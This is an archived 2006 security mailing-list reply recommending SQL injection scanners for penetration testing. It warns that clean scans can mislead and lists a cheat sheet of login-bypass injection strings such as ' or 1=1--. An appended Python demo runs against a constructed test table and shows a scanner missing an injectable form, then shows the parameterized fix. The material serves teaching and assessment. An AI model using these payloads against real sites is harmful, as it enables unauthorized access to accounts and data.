Re: Sql injection automated check tool

From: Joseph McCray (joe@learnsecurityonline.com)
Date: Sat Oct 07 2006 - 21:11:53 EDT


Hey Juan good to see you bud.

Yeah there are a few open source SQL Injection scanners, but a lot of
them are blind sql injection scanners (meaning they are basically table
name bruteforcers) that you would use after you get the website to
generate the sql syntax error.

I've found wapiti to be a tool that I like:
http://wapiti.sourceforge.net/

There are some simpler scanners that also I like:
oedipus <--- Taken offline recently (Google is your friend).
simplescanner.pl
extendedscanner.pl

What seems to be much more popular are the SQL bruteforcers - man there are
tons of them. sqlninja.pl for example can even upload netcat (you gotta
love that).

The guy whose website I would recommend you check out is Justin Clarke
(http://www.justinclarke.com/) and definitely read his EuSecWest
Presentation
(http://www.justinclarke.com/archives/2006/07/eusecwest_slide.html).
 
Caveat:
Just because you run these scanners against a site and they come up
clean, DOES NOT mean that the site is not vuln to SQL Injection. These
scanners primarily look for SQL errors returned and if the error
returned (if there even is one) doesn't fit the regular expression that
it's looking for then you'll be off thinking the site is ok when it's
not. Custom error pages, and plenty of other things, throw these types of
scanners off course.

This is exactly the discussion I was having with the class that I posted
about a few days ago that started all of the email traffic about
reporting vulns to companies. If it's a really big site, then I think
you should run multiple scanners against the site in question, and
manually verify the results.

I've had several cases where one tool will report one SQL Injection, and
other tools will not. I warn you that they are only a good "STARTING
POINT" to a thorough Web App Assessment.

Try to change the injections you use in the scanners as well. Here are a
few from my cheatsheet:

admin:' or a=a--
admin:' or 1=1--
admin'--
' or 0=0 --
" or 0=0 --
or 0=0 --
' or 0=0 #
" or 0=0 #
or 0=0 #
' or 'x'='x
" or "x"="x
') or ('x'='x
' or 1=1--
" or 1=1--
or 1=1--
' or a=a--
" or "a"="a
') or ('a'='a
") or ("a"="a
hi" or "a"="a
hi" or 1=1 --
hi' or 1=1 --
hi' or 'a'='a
hi') or ('a'='a
hi") or ("a"="a

Whew...long email. Hope this helps...

Joe
 

On Sat, 2006-10-07 at 09:32 -0700, Juan B wrote:
> Hi,
>
> Is there a tool to use in pen test to do sql
> injections?
>
> thanks very much !
>
> Juan
>

-- 
Joe McCray
Toll Free:  1-866-892-2132
Email:      joe@learnsecurityonline.com
Web:        https://www.learnsecurityonline.com
Learn Security Online, Inc.
* Security Games        * Simulators
* Challenge Servers     * Courses
* Hacking Competitions  * Hacklab Access
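An added illustration of the caveat above (example code written for this archive page, not from the original email or any of the tools it names): an error-based scanner that greps responses for database error text reports a login form as clean as soon as the site serves a generic custom error page, even though the concatenated query behind it still accepts the cheat-sheet entries. The in-memory SQLite table, the error regex and the response text are constructed here for the demonstration; the parameterized version at the end shows the fix.

```python
import re
import sqlite3

# Constructed in-memory users table standing in for a site's login backend (test data only).
def make_db():
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (name TEXT, pw TEXT)")
    con.execute("INSERT INTO users VALUES ('admin', 's3cret'), ('bob', 'hunter2')")
    return con

def vulnerable_login(con, user, pw):
    # String concatenation: whatever is typed into the form becomes part of the SQL text.
    sql = f"SELECT name FROM users WHERE name = '{user}' AND pw = '{pw}'"
    return [row[0] for row in con.execute(sql)]

def safe_login(con, user, pw):
    # Parameterized query: the input is bound as a value and is never parsed as SQL.
    sql = "SELECT name FROM users WHERE name = ? AND pw = ?"
    return [row[0] for row in con.execute(sql, (user, pw))]

def app_response(con, user, pw, custom_error_page):
    # The page body the web app sends back. custom_error_page models a generic
    # "sorry" page that hides the database error text from the client.
    try:
        rows = vulnerable_login(con, user, pw)
        return f"Welcome {rows[0]}" if rows else "Login failed"
    except sqlite3.Error as exc:
        if custom_error_page:
            return "Something went wrong, please try again later."
        return f"Database error: {type(exc).__name__}: {exc}"

# Illustrative error pattern of the kind an error-based scanner matches responses against.
SQL_ERROR_RE = re.compile(r"syntax error|unrecognized token|OperationalError", re.IGNORECASE)

def scanner_verdict(page_body):
    # True means "vulnerable"; any response the regex does not match is reported as clean.
    return bool(SQL_ERROR_RE.search(page_body))

if __name__ == "__main__":
    con = make_db()
    for custom in (False, True):
        probe = app_response(con, "admin", "'", custom)            # single-quote error probe
        attempt = app_response(con, "admin", "' or 1=1--", custom)  # entry from the cheat sheet
        print(f"custom error page={custom}: scanner says vulnerable={scanner_verdict(probe)}, "
              f"login form returned {attempt!r}")
    print("parameterized query with the same input:", safe_login(con, "admin", "' or 1=1--"))
```

With the custom error page on, the scanner's regex never fires while the same form still returns a welcome page, which is the false negative the email warns about; manual verification, not a clean scan, settles the question.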




This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:57:09 EDT